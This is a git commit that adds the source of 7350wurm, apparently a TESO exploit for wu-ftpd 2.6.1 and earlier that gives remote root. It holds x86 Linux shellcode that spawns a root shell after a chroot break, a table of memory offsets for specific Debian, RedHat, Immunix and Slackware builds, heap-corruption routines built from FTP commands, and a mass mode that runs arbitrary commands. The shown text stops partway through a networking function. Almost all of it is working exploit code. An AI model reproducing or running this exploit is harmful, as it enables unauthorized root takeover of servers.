initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
102 files changed, 13094 insertions, 0 deletions
diff --git a/exploits/7350wurm/7350wurm b/exploits/7350wurm/7350wurm
new file mode 100755
index 0000000..368e7e2
--- /dev/null
+++ b/exploits/7350wurm/7350wurm
Binary files differ
diff --git a/exploits/7350wurm/7350wurm-backup2.c b/exploits/7350wurm/7350wurm-backup2.c
new file mode 100644
index 0000000..7d8495e
--- /dev/null
+++ b/exploits/7350wurm/7350wurm-backup2.c
@@ -0,0 +1,1173 @@
+/* 7350wurm - x86/linux wu-ftpd remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
+ * ideas (synnergy.net rocks, thank you buddies ! :).
+ */
+#define VERSION "0.1.1"
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+#define INIT_CMD        "unset HISTFILE;id;uname -a;\n"
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\xeb\xfe";
+/* x86/linux write/read/exec code (41 bytes)
+ * does: 1. write (1, "\nsP\n", 4);
+ *       2. read (0, ncode, 0xff);
+ *       3. jmp ncode
+ */
+unsigned char   x86_wrx[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
+        "\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
+        "\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
+        "\x80\xeb\x05\xe8\xed\xff\xff\xff";
+unsigned char   x86_lnx_execve[] =
+        /* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
+         * code by lorian / teso
+         */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        /* 33 byte x86/linux PIC argv -sc
+         */
+        "\xeb\x1c\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+//      "\xe1\xb0\x0b\xcd\x80\xe8\xdf\xff\xff\xff";
+/*FIXME*/"\xe1\xb0\x0b\xcc\xcd\x80\xe8\xdf\xff\xff\xff";
+//                      ^^ debug trap
+/* setreuid/chroot/execve
+ * lorian / teso */
+unsigned char   x86_lnx_shell[] =
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+/* HOWTO get the offsets:
+   retloc: objdump -R /usr/sbin/in.ftpd | grep free
+   set retaddr to 0x41414141 and run the exploit:
+   $ ./7 -t <yourtype> -D -v
+   Now when it asks for enter, just press it, but as it asks the second
+   time, attach GDB to the wuftpd process. Continue it, and press enter
+   in the exploit. Wuftpd will segfault.
+   Do:
+   (gdb) x/10wx $esp
+   It will show some parameters to free, the first parameter of the form
+   0x08...... is interesting:
+   (gdb) x/64wx 0x08......
+   Should show a block of 0x0ceb0ceb's in memory. Just choose such a place
+   as retloc and there you are.
+ */
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       retaddr;        /* return address */
+} tgt_type;
+tgt_type tmanual = {
+        "manual values",
+        "unknown banner",
+        x86_wrx, sizeof (x86_wrx) - 1,
+        0x41414141, 0x42424242
+};
+tgt_type targets[] = {
+        { "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
+                "Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e7a0, 0x08094018 },
+        { "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
+                "Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x080713e0, 0x08093c40 },
+        { "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
+                "Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08072bd4, 0x080976e0},
+        { "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08061c48, 0x0806c948 },
+/* TODO: check, does not segfault !
+        { "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.rpm]",
+                "Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08069f04, 0x41414141 },
+*/
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806cb88, 0x08089848 },
+        { "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16(1)",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08098e40 },
+        /* slackware (from 8 on they use proftpd by default) */
+        { "Slackware 7",
+                "Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806d03c, 0x0808f648 },
+        { "Slackware 7.1",
+                "Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806ba2c, 0x08088e48 },
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* exploitation related stuff.
+ * DO NOT CHANGE, except you know exactly what you are doing.
+ */
+#define CHUNK_POS       256
+/* FTP related stuff
+ */
+char *  dest = "127.0.0.1";     /* can be changed with -d */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+/* FTP prototypes
+ */
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+/* main prototypes
+ */
+void usage (char *progname);
+tgt_type * tgt_frombanner (unsigned char *banner);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+void xp_buildsize (int fd, unsigned char this_size_ls);
+void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+/*** MASS mode stuff
+ */
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int             mass = 0;       /* enable with -m (kids, get hurt!) */
+unsigned int    mlen = 0;
+unsigned char   mcode[256];
+/* imported from network.c
+ */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+/* exploitation related stuff, which is fixed on all wuftpd systems
+ */
+#define RNFR_SIZE       4
+#define RNFR_NUM        73
+int     automode = 0;   /* evil, do not use */
+int     debugmode = 0;
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
+                "\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
+                "\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
+        fprintf (stderr,
+                "-h\tthis help\n"
+                "-v\tbe verbose (default: off, twice for greater effect)\n"
+                "-a\tAUTO mode (target from banner)\n"
+                "-D\tDEBUG mode (waits for keypresses)\n"
+                "-m\tenable mass mode (use with care)\n"
+                "-t num\tchoose target (0 for list, try -v or -v -v)\n"
+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "-d dest\tIP address or fqhn to connect to "
+                        "(default: 127.0.0.1)\n"
+                "-L loc\toverride target-supplied retloc (format: 0xdeadbeef)\n"
+                "-A addr\toverride target-supplied retaddr (format: 0xcafebabe)\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char *argv[])
+{
+        char                    c;
+        char *                  progname;       /* = argv[0] */
+        int                     fd;
+        tgt_type *              tgt = NULL;
+        int                     tgt_num = -1;
+        unsigned long int       user_retloc = 0,
+                                user_retaddr = 0;
+        unsigned long int       malign = 0;     /* PWD alignment */
+        unsigned char           xpbuf[512 + 16];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root\n"
+                "team teso (thx bnuts, tomas, synnergy.net !).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "M:hvaDmt:u:p:d:L:A:")) != EOF) {
+                switch (c) {
+                case 'M':
+                        if (sscanf (optarg, "%lu", &malign) != 1)
+                                usage (progname);
+                        break;
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'a':
+                        automode = 1;
+                        break;
+                case 'D':
+                        debugmode = 1;
+                        break;
+                case 'v':
+                        verbose += 1;
+                        break;
+                case 'm':
+                        mass = 1;
+                        break;
+                case 't':
+                        if (sscanf (optarg, "%u", &tgt_num) != 1)
+                                usage (progname);
+                        break;
+                case 'u':
+                        username = optarg;
+                        printf ("username = %s\n", optarg);
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                case 'd':
+                        dest = optarg;
+                        break;
+                case 'L':
+                        if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
+                                usage (progname);
+                        break;
+                case 'A':
+                        if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
+                                usage (progname);
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+        /* if both required offsets are given manually, then we dont have
+         * to require a target selection. otherwise check whether the target
+         * is within the list. if its not, then print a list of available
+         * targets
+         */
+        if (user_retloc != 0 && user_retaddr != 0) {
+                tgt = &tmanual;
+        } else if (automode == 0 && (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. giving list\n\n");
+                tgt_num = 0;
+                printf ("num . description\n");
+                printf ("----+-------------------------------------------------------\n");
+                for ( ; targets[tgt_num].desc != NULL ; ++tgt_num) {
+                        printf ("%3d | %s\n", tgt_num + 1,
+                                targets[tgt_num].desc);
+                        if (verbose)
+                                printf ("    :    %s\n", targets[tgt_num].banner);
+                        if (verbose >= 2)
+                                printf ("    :    retloc: 0x%08lx   "
+                                        "retaddr: 0x%08lx\n",
+                                        targets[tgt_num].retloc,
+                                        targets[tgt_num].retaddr);
+                }
+                printf ("    '\n");
+                exit (EXIT_SUCCESS);
+        }
+        if (tgt == NULL && automode == 0)
+                tgt = &targets[tgt_num - 1];
+        if (mass == 1) {
+                if ((argc - optind) == 0)
+                        usage (progname);
+                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
+                        x86_lnx_execve, &argv[optind]);
+                if (mlen >= 0xff) {
+                        fprintf (stderr, "created argv-code too long "
+                                "(%d bytes)\n", mlen);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
+        }
+        printf ("# trying to log into %s with (%s/%s) ...", dest,
+                username, password);
+        fflush (stdout);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf (" connected.\n");
+        if (debugmode) {
+                printf ("DEBUG: press enter\n");
+                getchar ();
+        }
+        printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        if (tgt == NULL && automode) {
+                tgt = tgt_frombanner (ftp_banner);
+                if (tgt == NULL) {
+                        printf ("# failed to jield target from banner, aborting\n");
+                        exit (EXIT_FAILURE);
+                }
+                printf ("# successfully selected target from banner\n");
+        }
+        if (user_retaddr != 0) {
+                fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
+                        user_retaddr);
+                tgt->retaddr = user_retaddr;
+        }
+        if (user_retloc != 0) {
+                fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
+                        user_retloc);
+                tgt->retloc = user_retloc;
+        }
+        printf ("\n### TARGET: %s\n\n", tgt->desc);
+        /* real stuff starts from here
+         */
+        printf ("# 1. filling memory gaps\n");
+        xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
+        printf ("# 2. sending bigbuf + fakechunk\n");
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        if (verbose)
+                hexdump ("xpbuf", xpbuf, strlen (xpbuf));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        net_write (fd, "CWD %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        /* synnergy.net uberleet method (thank you very much guys !)
+         */
+        net_write (fd, "CWD ~/{.,.,.,.}\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* now, we flush the last-used-chunk marker in glibc malloc code. else
+         * we might land in a previously used bigger chunk, but we need a
+         * sequential order. "CWD ." will allocate a two byte chunk, which will
+         * be reused on any later small malloc.
+         */
+        net_write (fd, "CWD .\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        xp_gapfill (fd, 1, 16); /* cause chunk w/ 0x20 size */
+        {
+                unsigned long int       dir_chunk_size,
+                                        bridge_dist,
+                                        padchunk_size,
+                                        fakechunk_size;
+                unsigned char *         dl;     /* dirlength */
+                net_write (fd, "PWD\n");
+                ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
+                dl = strchr (xpbuf, '"');
+                if (dl == NULL || strchr (dl + 1, '"') == NULL) {
+                        fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
+                        exit (EXIT_FAILURE);
+                }
+                dir_chunk_size = 0;
+                for (dl += 1 ; *dl != '"' ; ++dl)
+                        dir_chunk_size += 1;
+                dir_chunk_size += 1;    /* NUL byte */
+                dir_chunk_size = (dir_chunk_size + 7) & ~7;
+                dir_chunk_size = (dir_chunk_size + 4 + 7) & ~7;
+                printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
+                /* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
+                bridge_dist = 0x10 + 4 * dir_chunk_size;
+                printf ("bridge_dist = 0x%08lx\n", bridge_dist);
+                /* 0x18 (RNFR 16), 0x10 (RNFR .), 0x10 (CWD ~{) */
+                padchunk_size = bridge_dist - 0x18 - 0x10 - 0x10;
+                printf ("padchunk_size = 0x%08lx\n", padchunk_size);
+                /* +4 = this_size field itself */
+                fakechunk_size = CHUNK_POS - 0x1c + 4;
+#if 0
+                fakechunk_size = 0x18 + /* RNFR 16* */
+                        0x10 +          /* RNFR . */
+                        padchunk_size + /* RNFR padding */
+                        0x10 +          /* CWD ~{ */
+                        0x10;           /* globlist = malloc(...) */
+#endif
+                fakechunk_size |= 0x1;  /* PREV_INUSE */
+                printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
+                xp_buildsize (fd, fakechunk_size);      /* fakechunk size */
+                xp_gapfill (fd, 1, 1);                  /* protect this_size */
+                /* pad down to the minimum possible size in 8 byte alignment
+                 */
+                xp_gapfill (fd, 1, padchunk_size - 8 - 1);
+        }
+        if (debugmode) {
+                printf ("press enter\n");
+                getchar ();
+        }
+        printf ("# 3. triggering free(globlist[1])\n");
+        net_write (fd, "CWD ~{\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
+        if (strncmp (xpbuf, "sP", 2) != 0) {
+                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
+                        xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        printf ("#\n# exploitation succeeded. sending real shellcode\n");
+        if (mass == 1) {
+                printf ("# mass mode, sending constructed argv code\n");
+                net_write (fd, "%s\n", mcode);
+                printf ("# send. sleeping 10 seconds\n");
+                sleep (10);
+                printf ("# success.\n");
+                exit (EXIT_SUCCESS);
+        }
+        printf ("# sending setreuid/chroot/execve shellcode\n");
+        net_write (fd, "%s", x86_lnx_shell);
+        printf ("# spawning shell\n");
+        printf ("##################################################"
+                        "##########################\n");
+        write (fd, INIT_CMD, strlen (INIT_CMD));
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+tgt_type *
+tgt_frombanner (unsigned char *banner)
+{
+        int     tw;     /* target list walker */
+        for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
+                if (strstr (banner, targets[tw].banner) != NULL)
+                        return (&targets[tw]);
+        }
+        return (NULL);
+}
+void
+xp_buildsize (int fd, unsigned char this_size_ls)
+{
+        int             n;
+        char *          rst_arr[3] = { "7350foo", "7350fo", NULL };
+        unsigned char   tmpbuf[512];
+        for (n = 0 ; rst_arr[n] != NULL ; ++n) {
+                net_write (fd, "CWD %s\n", rst_arr[n]);
+                ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        }
+        net_write (fd, "CWD 7350%c\n", this_size_ls);
+        ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        return;
+}
+/* xp_gapfill
+ *
+ * fill all small memory gaps in wuftpd malloc space. do this by sending
+ * rnfr requests which cause a memleak in wuftpd.
+ *
+ * return in any case
+ */
+void
+xp_gapfill (int fd, int rnfr_num, int rnfr_size)
+{
+        int             n;
+        unsigned char * rb;             /* rnfr buffer */
+        unsigned char * rbw;            /* rnfr buffer walker */
+        unsigned char   rcv_buf[512];   /* temporary receive buffer */
+        rbw = rb = calloc (1, rnfr_size + 6);
+        strcpy (rbw, "RNFR ");
+        rbw += strlen (rbw);
+        /* append a string of "././././". since wuftpd only checks whether
+         * the pathname is lstat'able, it will go through without any problems
+         */
+        for (n = 0 ; n < rnfr_size ; ++n)
+                strcat (rbw, ((n % 2) == 0) ? "." : "/");
+        strcat (rbw, "\n");
+        for (n = 0 ; n < rnfr_num; ++n) {
+                net_write (fd, "%s", rb);
+                ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
+        }
+        free (rb);
+        return;
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        unsigned char * wl;
+        memset (buf, '\0', buf_len);
+        memset (buf, '0', CHUNK_POS);
+        xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
+        for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
+                wl[0] = '\xeb';
+                wl[1] = '\x0c';
+        }
+        memcpy (&buf[buf_len - 1] - tgt->shellcode_len, tgt->shellcode,
+                tgt->shellcode_len);
+        return (strlen (buf));
+}
+/* xp_buildchunk
+ *
+ * build the fake malloc chunk that will overwrite retloc with retaddr
+ */
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, tgt->retaddr, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[0], 0xfffffff0);            /* prev_size */
+        ADDR_STORE (&cspace[4], 0xfffffffc);            /* this_size */
+        ADDR_STORE (&cspace[8], tgt->retloc - 12);      /* fd */
+        ADDR_STORE (&cspace[12], tgt->retaddr);         /* bk */ 
+        return;
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l == 0) {
+                                printf ("connection closed by foreign host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) +
